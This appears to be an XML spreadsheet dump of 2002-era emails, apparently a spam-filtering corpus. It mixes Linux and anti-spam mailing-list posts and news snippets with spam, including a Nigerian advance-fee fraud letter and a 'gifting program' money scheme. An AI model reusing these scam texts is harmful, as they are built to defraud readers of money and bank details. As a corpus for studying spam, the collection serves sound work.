             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Type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face=3D"Arial, Helvetica, sans-serif" color=3D=
 #666600
       size=3D1&gt;=FFFFFFA9 1999-2002 CCFL &lt;BR&gt; To be removed from our distri=
 bution lists, please  
       &lt;A href=3D"mailto:d_lete112@eudoramail.com?subject=3DRemove_Conferen=
 cing"&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;That Goddess Chick wrote:
 &gt;&gt;
 &gt;&gt;  &gt;Thanks Fel.  Got no scanner.  My photo is in that group of 100 obsessive
 &gt;&gt;  &gt;compulsive clipsters in FT, 1996 or 1997.
 &gt;&gt;  &gt;
 &gt;&gt;  &gt;Terry
 &gt;&gt;
 &gt;&gt;  Great, and right now all my pre '98s are in Washington state, in a
 &gt;&gt;  cardboard box in a shed in the back of Sydde's garage. Probably mice
 &gt;&gt;  nests by now. :-(  Put a scanner on your Christmas list right above
 &gt;&gt;  world peace!
 &gt;&gt;  --
 &gt;&gt;
 &gt;&gt;  Fel
 &gt;&gt;  NEW!! Cafe Forteana is back: 
 &gt;&gt;&lt;http://www.frogstone.net/Cafe/CafeForteana.html&gt;http://www.frogstone.net/Cafe/CafeForteana.html
 &gt;
 &gt;Maybe a kind soul with access to that issue and a scanner could scan it and
 &gt;forward to you.
 &gt;
 &gt;Terry
 &gt;
 I would appreciate that very much as I won't be getting back to 
 Washington until December.
 -- 
 Fel
 NEW!! Cafe Forteana is back: http://www.frogstone.net/Cafe/CafeForteana.html
 http://www.frogstone.net
 Weird Page: http://my.athenet.net/~felinda/WeirdPage.html
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home with Ease!
 http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-24
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Damian Conway Publishes Exegesis 5
     posted by hfb on Friday August 23, @14:06 (perl6)
     http://use.perl.org/article.pl?sid=02/08/23/187226
 2nd Open Source CMS Conference
     posted by ziggy on Friday August 23, @18:30 (events)
     http://use.perl.org/article.pl?sid=02/08/23/1837242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</si>
  <si>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The Ozone Hole is getting smaller... But Leroy's Getting LARRRRRGER
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8423195,1717/
 Date: 2002-10-01T08:34:10+01:00
 [IMG: http://www.newsisfree.com/Images/fark/yahoonews.gif ([Yahoo])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] [OT] Oceanfree Dial-up Number
</t>
  </si>
  <si>
    <t xml:space="preserve">Actually, they do; though they aren't case sensitive. It seems to have some 
 trouble wtih PAP/CHAP authentication  as well; you might have to do it by 
 script?
 On Friday 26 July 2002 12:37, Liam Bedford wrote:
 &gt; On Fri, 26 Jul 2002 12:23:24 +0100
 &gt;
 &gt; HAMILTON,DAVID (HP-Ireland,ex2) claiming to think:
 &gt; &gt; Hi All,
 &gt; &gt;
 &gt; &gt; I am trying to find the Oceanfree ISDN dialup number for Dublin.
 &gt; &gt; http://iiu.taint.org/ appears to be down, or at least I can't get to it,
 &gt; &gt; and I don't want to pay oceanfree 10 per second for tech support :-).
 &gt;
 &gt; 01-2434321
 &gt; username: oceanfree
 &gt; password: oceanfree
 &gt;
 &gt; don't think the username and password matter much though.
 &gt;
 &gt; L.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] BUSINESS
</t>
  </si>
  <si>
    <t xml:space="preserve">CENTRAL BANK OF NIGERIA
 FOREIGN REMITTANCE DEPT.
 TINUBU SQUARE, LAGOS  NIGERIA
 EMAIL-smith_j@mailsurf.com
 23TH OF August 2002
 ATTN:PRESIDENT/CEO
                     STRICTLY PRIVATE BUSINESS PROPOSAL
 I am MR.Johnson S. Abu, the bills and exchange Director at the
 ForeignRemittance Department of the Central Bank of Nigeria.  I am 
 writingyou
 this letter to ask for your support and cooperation to carrying thisbusiness
 opportunity in my department.  We discovered abandoned the sumof
 US$37,400,000.00 (Thirty seven million four hundred thousand unitedstates
 dollars) in an account that belong to one of our foreign customers,an
 American
 late Engr. John Creek (Junior) an oil merchant with the federal government
 of
 Nigeria who died along with his entire family of a wifeand two children in
 Kenya Airbus (A310-300) flight KQ430 in November2000.
 Since we heard of his death, we have been expecting his next of kin tocome
 over
 and put claims for his money as the heir, because we cannotrelease the fund
 from his account unless someone applies for claims asthe next  of kin to the
 deceased as indicated in our banking guidelines. Unfortunately, neither
 their
 family member nor distant relative hasappeared to claim the said fund.  Upon
 this discovery, I and other officialsin my department have agreed to make
 business with you release the totalamount into your account as the heir of
 the
 fund since no one came forit or discovered either maintained account with
 our
 bank, other wisethe fund will be returned to the bank treasury as unclaimed
 fund.
 We have agreed that our ratio of sharing will be as stated thus: 30%for
 you as
 foreign partner and 70% for us the officials in my department.
 Upon the successful completion of this transfer, my colleague and I
 willcome to
 your country and mind our share. It is from our 60% we intendto import
 computer
 accessories into my country as way of recycling thefund.  To commence this
 transaction we require you to immediately indicateyour interest by calling
 me
 or sending me a fax immediately on the aboveTelefax # and enclose your
 private
 contact Telephone #, Fax #, full nameand address and your designated
 banking co-
  ordinates to enable us fileletter of  claim to the appropriate department
 for
 necessary approvalsbefore the transfer can be made.
 Note also, this transaction must be kept strictly confidential becauseof its
 nature.
 NB: Please remember to give me your Phone and Fax No
 MR.Johnson Smith  Abu
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 'Miracle' gene therapy trial halted
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8519920,1440/
 Date: Not supplied
 A French trial of a highly promising treatment for the fatal "bubble boy" 
 disease is stopped after a patient developed leukaemia
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Perens Backs Out of Stunt
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.siliconvalley.com/mld/siliconvalley/business/columnists/dan_gillmor/ejournal/3735855.htm
 Posted on Thu, Jul. 25, 2002
 Copyright Law Thwarts Open Source Confab Demo
 Posted by Dan Gillmor
 Bruce Perens was going to demonstrate a modified DVD player at this week's
 Open Source gathering in San Diego. He'd planned to show (Infoworld) how a
 DVD player with its regional coding disabled could play DVDs with
 different regional codes.
 Perens was going to do this in violation, he believed, of the Digital
 Millennium Copyright Act, which bans the circumvention of technological
 methods to protect copyrighted material from uses the owner doesn't want.
 And the possibility of legal trouble led his employer, Hewlett-Packard, to
 ask him not to do the demonstration.
 HP funds Perens to pursue a variety of free software projects. He was
 willing to take the legal risks himself, he told me today, but HP worried
 that it would be "a more juicy target," the kind of deep pockets that
 might make the entertainment cartel drool. In that context it's
 understandable why HP would be concerned, though I wish the company would
 take a stand on the right side of this issue.
 So while Perens is going to talk about the DMCA's pernicious impact on
 things like free software, he's not going to give his demonstration. A
 shame, but that's how things are going these days.
 Hollywood is winning, folks. You are losing. And you'd better start caring
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: turning off checksums per MIME part
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 19, 2002 at 10:17:26AM -0700, Chad Norwood wrote:
 &gt;   The way Razor breaks down mail is simple.  If a mail contains MIME
 &gt;   boundaries it is split on those boundaries, each MIME part is considered 
 &gt;   when marking the mail as spam.
 This isn't a MIME message that it is breaking down though.  The
 message as sent to me is just a regular one part, non-MIME message.
 The contents of the message among other things is a forwarded message
 (inline not as an attachment) that happens to have MIME parts.
 &gt;   In 2.14, there are different 'logic methods' for detecting spam.
 &gt;   The default method 5 requires all non-contention parts to be spam for
 I see 1-4 documented in the manpage.  2 looked like a good candidate
 but the manpage states that only 1, 3, and 4 are on by default.  No
 mention of method 5 though that I can see.
 &gt;   the mail to be marked as spam.  A part is considered under
 &gt;   contention if its not clear if its spam are not, and is relatively
 &gt;   rare.
 &gt; 
 &gt;   Sounds like you are not using 2.14, or maybe you're misinterpreting
 Actually I am using 2.14.
 &gt;   the log files.  Feel free to send me the log files if you think 
 &gt;   there is a bug.
 &gt;   
 &gt;   Also, as jordan says, if you get a legit mail marked as spam (based
 &gt;   on whatever MIME stuff is going on), you should revoke it (which sends
 &gt;   all parts in) so TeS can take care of business.  
 I have to run off to a meeting but I'll send you a copy of the logs
 and the message that triggered as SPAM when I get back.  I'll also
 revoke it along with the other 3 similar messages and the Security
 Advisory that were wrongly called SPAM this morning.
 Thanks.
 -steve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</si>
  <si>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[SAtalk] redhat init.d script for spamd and the -H option
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --UHN/qo2QbUvPLonB
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Fri, Sep 06, 2002 at 11:32:01AM -0500, Josh Hildebrand wrote:
 &gt; Unfortunately, when I run that, it complains about the H parameter.
 &gt;=20
 &gt;   -F 0|1          remove/add 'From ' line at start of output (default: 1)
 &gt;=20
 &gt; But I can run it on the command line as "spamd -d -c -a -H" just fine.
 &gt;=20
 &gt; Anyone else run into this problem?
 you look to have 2 versions of spamd installed.  The one running from
 the RC script is pre-2.4 (there is a -H now, and -F has been removed),
 but the one you run from the commandline seems to be a 2.4x version.
 I would find that old version of SA and blow it away.
 --=20
 Randomly Generated Tagline:
 "If you lend someone $20, and never see that person again, it was probably
  worth it." - Zen Musings
 --UHN/qo2QbUvPLonB
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9eOvDAuOQUeWAs2MRAmQQAKDvRrfV2FasxShCaSQCCdfbvx4mbQCeK3Eq
 IXNsRLjK0elfi5oPbnQedEI=
 =woQJ
 -----END PGP SIGNATURE-----
 --UHN/qo2QbUvPLonB--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</si>
  <si>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ADV: Promote Your Website!
</t>
  </si>
  <si>
    <t xml:space="preserve">Removal instructions below
 I saw your listing on the internet.  I work
 for a company that submits websites to search
 engines.  We can submit your website to over
 350 of the worlds best search engines and 
 directories for a one time charge of only
 $39.95.  
 If you would like to put your website in 
 the fast lane and receive more
 traffic call me on our toll-free number
 listed below.  
 All work is verified!
 Sincerely,
 Brian Franks
 888-532-8842
 To be removed call:888-800-6339 Ext. 1377
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MC Escher in Lego
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85538591
 Date: Not supplied
 [IMG: http://www.craphound.com/images/escherlego.jpg] Lego enthusiasts have 
 implemented three of Escher's optical illusion paintings (including "Ascending 
 and Descending," pictured here), using Lego! Link[1] Discuss[2] (_via MeFi[3]_) 
 [1] http://www.lipsons.pwp.blueyonder.co.uk/escher/ascending.html
 [2] http://www.quicktopic.com/boing/H/gHYxJ6d46EVY
 [3] http://www.metafilter.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Davis stirs grassroots with right to buy promise
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688975,215/
 Date: 2002-10-09T03:15:16+01:00
 *Tory conference:* Thatcherites cheer former chairman's housing plans.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: cc Prevents diesel fuel gelling 3750r-5
</t>
  </si>
  <si>
    <t xml:space="preserve">1075RxOo9-26l11
 INCREASE YOUR GAS MILEAGE
 It's easy and fast
 Anyone can install
 Works on ANY automobile engine
 Improves engine performance
 Tested by a recognized EPA Testing Laboratory
 GUARANTEED 100%
 http://81.9.8.40/cgi-bin/fuelmax/index.cgi?10564
 joe194515085@yahoo.com
 7176wbXV7-572KhIe3021SSOm3-741OdYj0683YBff8-525iYl46
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] fully-public corpus of mail available
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; (Please feel free to forward this message to other possibly-interested
 &gt; parties.)
 Some caveats (in decending order of concern):
 1. These messages could end up being falsely (or incorrectly) reported
    to Razor, DCC, Pyzor, etc.  Certain RBLs too.  I don't think the
    results for these distributed tests can be trusted in any way,
    shape, or form when running over a public corpus.
 2. These messages could also be submitted (more than once) to projects
    like SpamAssassin that rely on filtering results submission for GA
    tuning and development.
 3. Spammers could adopt elements of the good messages to throw off
    filters.  And, of course, there's always progression in technology
    (by both spammers and non-spammers).
 The second problem could be alleviated somewhat by adding a Nilsimsa
 signature (or similar) to the mass-check file (the results format used
 by SpamAssassin) and giving the message files unique names (MD5 or
 SHA-1 of each file).
 The third problem doesn't really worry me.
 These problems (and perhaps others I have not identified) are unique
 to spam filtering.  Compression corpuses and other performance-related
 corpuses have their own set of problems, of course.
 In other words, I don't think there's any replacement for having
 multiple independent corpuses.  Finding better ways to distribute
 testing and collate results seems like a more viable long-term solution
 (and I'm glad we're working on exactly that for SpamAssassin).  If
 you're going to seriously work on filter development, building a corpus
 of 10000-50000 messages (half spam/half non-spam) is not really that
 much work.  If you don't get enough spam, creating multi-technique
 spamtraps (web, usenet, replying to spam) is pretty easy.  And who
 doesn't get thousands of non-spam every week?  ;-)
 Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Eirikur Hallgrimsson said:
 &gt; Let me ask you....If you were on a rock in the middle of the Atlantic, 
 &gt; mostly in the dark for half the year, wouldn't *you* like a bit of 
 &gt; internet distraction?   They've already done the obvious and fiber-ringed 
 &gt; the island.
 BTW did they do the same as they did in Ireland, namely: spend millions
 burying copious miles of dark fibre, then neglect to provide any way of
 actually hooking it up to any ISPs? ;)
 --j. (frustrated)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] [OT] GPL &amp; PHP Question
</t>
  </si>
  <si>
    <t xml:space="preserve">Could anyone who is interested clarify this for me.
 Or point me in the direction of a site that does GPL case studies where there may be a similar issue. I have had a google around and the PHP site wasn't help full and the GPL page didn't seem to have this senario.
 The setup is as follows:
 I develop a piece of code using PHP 3.0.9 which is, to
 my knowledge, GPL. 
 The piece of code runs on my server and is an integral part of a system that I have developed for a client. I did not recieve  payment for this particular piece of code but I did recieve payment for the system. My client now wants to  
 use a different service provider but keep my code. 
 Do I have a right to claim intellectual property rights for  my little piece of code that he did not pay me for or do I have to give the client the code under the GPL.
 I know this is not strictly a 'Linux' issue but any help would be appreciated
 Ant
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ATT Wireless Location tracking
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/12.html
 Date: 2002-09-12T04:04:00-08:00
 It seems like ATTWS will offer a service that'll tell you where your friends 
 (or children or spouse or whatever) are ... I haven't seen it announced, but 
 from their "Explanation of Rates and Charges. "Find Friends service will only 
 locate a compatible mobile device with mMode service that (1) has granted you 
 permission, (2) is turned on, (3) is registered on the AT&amp;T Wireless GSM/GPRS 
 network, and (4) has not activated Be Invisible. Location services only provide 
 the location...
</t>
  </si>
  <si>
    <t xml:space="preserve">I used Async IO on System V in the '87, '88 time frame.  I did it that
 way cause I thought it was cool to see if I could keep the tape
 spinning.
 I can believe Linux is catching up to this, but some ability to do async
 IO already existed in the UNIX world.
 John Hall
 13464 95th Ave NE
 Kirkland WA 98034
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Adam
 &gt; L. Beberg
 &gt; Sent: Saturday, August 31, 2002 7:35 PM
 &gt; To: fork@example.com
 &gt; Subject: Gasp!
 &gt; 
 &gt; "Red Hat Linux Advanced Server provides many high end features such
 as:
 &gt; Support for Asynchronous I/O. Now read I/O no longer needs to stall
 your
 &gt; application while waiting for completion."
 &gt; 
 &gt; Could it be? After 20 years without this feature UNIX finally catches
 up
 &gt; to
 &gt; Windows and has I/O that doesnt totally suck for nontrivial apps? No
 way!
 &gt; 
 &gt; OK, so they do it with signals or a flag, which is completely ghetto,
 but
 &gt; at
 &gt; least they are trying. Keep trying guys, you got the idea, but not the
 &gt; clue.
 &gt; 
 &gt; - Adam L. "Duncan" Beberg
 &gt;   http://www.mithral.com/~beberg/
 &gt;   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Wed, 9 Oct 2002, "Jason" == Jason Rennie wrote:
   Jason&gt; My sysadmins have told me that the sending mail client
   Jason&gt; is supposed to escape lines begining with "From ".
 Your sysadmins are wrong.
 Whatever program that is used to store the mail into the 
 braindead "mailbox" file (/var/spool/mail/whatever) is supposed 
 to escape a line that begins with From.  That program is called 
 the local Mail Delivery Agent (MDA)
 It would be better if you never, ever, stored your mail in a 
 "mailbox" file.
 If your sysadmins are capable of it, get them to set up the 
 receiving Mail Transfer Agent (MTA) to allow the use of procmail 
 as the local MDA.  Then use procmail to invoke rcvstore and 
 deliver your mail directly into your MH mail folders.
 Most Linux systems come configured this way, if a user has a
 $HOME/.procmail file then mail is delivered using procmail.
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SA] EM1- Aren't we accorded equal opportunity already?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 	Aren't Asian Pacfic Americans (APAs) accorded equal 
 opportunity already?  Unfortunately, no.  APAs are not accorded 
 equal opportunity in workplaces presently.  
 	Equal opportunity means: "For every man, woman and 
 child to go as far and rise as high as their ambition and ability 
 will take them."  Statistics, mostly gathered by government 
 studies, show that AAs have only 1/3 the opportunity of all 
 other Americans to rise to the top in the academic world, 
 corporate world, the federal government.  There seems to exist 
 an invisible resistance to AAs' developing to the maximal of 
 their potentials  --  A Glass Ceiling.
 	Let's look at a concrete case.  A lot of our best people are 
 employed in universities.  Their average performance has been 
 outstanding.  What's their chance of rising to the top?  
 	University administrators are recruited almost exclusively 
 from the ranks of faculty and professionals already employed in 
 universities.  Hence the ratio of [administrators / (faculty + 
 professionals)], broken down to races, is a measure of the 
 opportunity enjoyed by American citizens of different races.  
 Nationwide, that ratio for blacks (non-Hispanic) is 0.21.  That is, 
 for every 100 black faculty and professionals there are 21 black 
 administrators.  The ratio for Native American is 0.20; for white 
 (non-Hispanic) is 0.16; and for Hispanic is 0.15.  However, it is 
 only 0.06 for Asian American.  Get on the Web and check it out 
 for yourself!  Source:  Dept. of Education - &lt;www.ed.gov/NCES/ 
 pubs/96323.html&gt;, Table B-1f.
 	The above dismal picture emerges from the supposedly 
 "enlightened" academic world.  The situation in the corporate 
 world, state and federal governments is worse.  
 	In E-Mail 2 &amp; 3, we present a strategy to induce the two 
 major political parties to help us fight for equal opportunity and 
 help make our beloved nation "a more perfect Union."   There has 
 already been progress on account of that strategy.  Behold how the 
 glass ceiling in the federal government is being shattered, owing
 significantly to the bloc-vote organized and delivered by 80-20 in 
 the 2000 election.
 Sincerely (members of Steering Comm., titles for ID purposes only)
 Rajen Anand, Secretary, Federation of Indian-Am. Assocs.,
 Tong S. Chung, Founding President &amp; Current Chairman of the Board,
                      Korean American Coalition, DC chapter,
 Alex Esclamado, Nat'l President, Filipino-Am. Political Assoc.,
 Kenneth Fong, C.E.O., Clontech Laboratories,
 Yu-Chi Ho, Harvard Univ., member of Nat'l Acad. of Engineering,
 Stephen S. Ko, MD, Founder of Asian Am. Political Coalition N.J.,
 Tony Lam, Councilman, Westminster, Los Angeles, California,
 Michael Lin, former Nat'l President, Org. of Ch-Ams (1994-98),
 Adeel Shah, Co-founder &amp; Chairman/CEO of Telnia Corporation and
           President, US-Pakistan Business Council Washington, D.C.,
 Peter Suzuki, Immediate Past President, National Asian/Pacific Am.
                    Bar Association (NAPABA),
 Henry Tang, Chair, Committee of 100,
 Shaie-Mei Temple, Founding President, OCA-women New Orleans
                     Chapter; Strategic Consultant,
 Chang-Lin Tien, Chancellor, Univ. of Calif., Berkeley (1990-97),
 Chun Wa Wong, Univ. of Calif., Los Angeles, Fellow, Am. phys. Soc.,
 S. B. Woo, Lieutenant Governor of Delaware (1985-89)
 Jenny Yang, President, Assoc. of Chinese Am. Professionals; Co-founder,
                   Houston 80-20
 * * * * * * * * * * *
 80-20 is a national, nonpartisan, Political Action Committee 
 dedicated to winning equal opportunity and justice for all 
 Asian Pacific Americans through a SWING bloc vote, ideally 
 directing 80% of our community's votes and money to the 
 presidential candidate endorsed by the 80-20, who better 
 represents the interests of all APAs.  Hence, the name "80-20" was 
 created. 
   -- For unsubscribing,  return this email AND add the word:REMOVE. --
   -- To get on 80-20's supporters list, reply with the word:ENLIST. --
 MsTo: matthew.simonton@blade.net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</si>
  <si>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Man dies as whale lands on boat
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Sven Guckes &lt;guckes@math.fu-berlin.de&gt;
 http://news.com.au/common/story_page/0,4057,5037762%255E13762,00.html
 Port San Luis, California
 September 05, 2002
 A WHALE which suddenly breached and crashed into the bow of a
 fishing boat killed a restaurant owner on board.
 Jerry Tibbs, 51, of Bakersfield, California, was aboard his boat,
 The BBQ, when the whale hit and tossed him into the sea five miles
 off Port San Luis.
 Three other fishermen stayed aboard the damaged boat, which was
 towed to shore by the US Coast Guard.
 Tibbs and his three friends were just ending a day fishing for
 albacore when the accident occurred, authorities said.
 Tibbs' body was found after a search lasting more than 18 hours
 Coast Guard officials said it was the first time they could recall
 an accident caused by a whale hitting a boat.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: use of base image / delta image for automated recovery from attacks
</t>
  </si>
  <si>
    <t xml:space="preserve">
 take a look at http://www.pcworld.com/news/article/0,aid,102881,00.asp
  Andrey                            mailto:andr@sandy.ru
 BM&gt; Does anyone do this already? Or is this a new concept? Or has this concept
 BM&gt; been discussed before and abandoned for some reasons that I don't yet know?
 BM&gt; I use the physical architecture of a basic web application as an example in
 BM&gt; this post, but this concept could of course be applied to most server
 BM&gt; systems. It would allow for the hardware-separation of volatile and
 BM&gt; non-volatile disk images. It would be analogous to performing nightly
 BM&gt; ghosting operations, only it would be more efficient and involve less (or
 BM&gt; no) downtime.
 BM&gt; Thanks for any opinions,
 BM&gt; Ben
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PROTECT YOUR INFORMATION AND YOUR COMPUTER
</t>
  </si>
  <si>
    <t xml:space="preserve">ATTENTION: This is a MUST for ALL Computer Users!!!
 *NEW-Special Package Deal!*
 Norton SystemWorks 2002 Software Suite -Professional Edition-
 Includes Six - Yes 6! - Feature-Packed Utilities
 ALL For 1 Special LOW Price!
 This Software Will:
 - Protect your computer from unwanted and hazardous viruses
 - Help secure your private &amp; valuable information
 - Allow you to transfer files and send e-mails safely
 - Backup your ALL your data quick and easily
 - Improve your PC's performance w/superior integral diagnostics!
 6 Feature-Packed Utilities...1 Great Price!
 A $300+ Combined Retail Value!
 YOURS for Only $29.99!  &lt;Includes FREE Shipping!&gt;
 Don't fall prey to destructive viruses or hackers!
 Protect  your computer and your valuable information!
 So don't delay...get your copy TODAY!
 http://euro.specialdiscounts4u.com/
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 This email has been screened and filtered by our in house ""OPT-OUT"" system in 
 compliance with state laws. If you wish to "OPT-OUT" from this mailing as well 
 as the lists of thousands  of other email providers please visit  
 http://dvd.specialdiscounts4u.com/optoutd.html
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
</t>
  </si>
  <si>
    <t xml:space="preserve">Perhaps we should start a grass roots movement here on FoRK and send the 
 nice lady a few emails on his behalf? Better yet, why don't we see on 
 who can write the best personals ad for Rohit? I'll post the best one to 
 Craigs' list on his behalf. The winner can take me out to dinner. (No, 
 really, I'm charming.)
 Elias
 Robert Harley wrote:
 &gt;Pity.  Reading that woman's ad and knowing Rohit for years, they sound
 &gt;like a match made in heaven.  But why, oh, why, keep that shaved-head
 &gt;photo on prominent display???  There are lots of photos of Rohit
 &gt;looking rather dashing, and with the crucial hair feature enabled!
 &gt;
 &gt;R
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] keep submitting known spam?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 03:26:38PM -0700, Chip Paswater wrote:
 &gt; 
 &gt; Perhaps a feature can be added to razor-report, so that it checks whether a
 &gt; message is spam before it submits it.  If it is spam, then don't send the
 &gt; body, 4 signatures, etc, just up the "rating" for that individual spam.
 Yep, that how razor-agents currently work.
 cheers,
 vipul.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</si>
  <si>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Tom wrote:
 &gt; 3k is a number that probably sounds good to some closted  homophobe with
 &gt; secret desires to be "belle of the balls". Twinks dinks and dorks, this
 &gt; thread sounds to me like someone needs a little luvin.
 I dunno if I'd accuse everybody who believes the 3K number of needing a
 little luvin, but I completely believe that this myth has survived because
 there's a lot of people who need more lovin.  Plus it fits in with a bunch
 of different archetypes.
 - Lucas
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Important Information Concerning Your Bank Account 
</t>
  </si>
  <si>
    <t xml:space="preserve">TIRED OF THE BULL OUT THERE?
 Want To Stop Losing Money?
 WANT A REAL MONEY MAKER?
 RECEIVE $1,000-$5,000 TODAY!
 EXPERTS ARE CALLING THIS THE FASTEST WAY TO HUGE CASH FLOW EVER CONCEIVED!
 A POWERHOUSE Gifting Program You Don't Want To Miss!
 We work as a TEAM! 
 This is YOUR Private Invitation GET IN WITH THE FOUNDERS! This is where the BIG BOYS PLAY! The MAJOR PLAYERS are on This ONE For ONCE be where the Players are
 This is a system that will drive $1,000's to your doorstep 
 In a short period of time!
 Leverage $1000.00 into $50,000, Over and Over Again 
 THE QUESTION HERE IS:
 YOU EITHER WANT TO BE WEALTHY OR YOU DON'T!!!
 WHICH ONE ARE YOU?
 I am tossing you a financial lifeline and for your sake I 
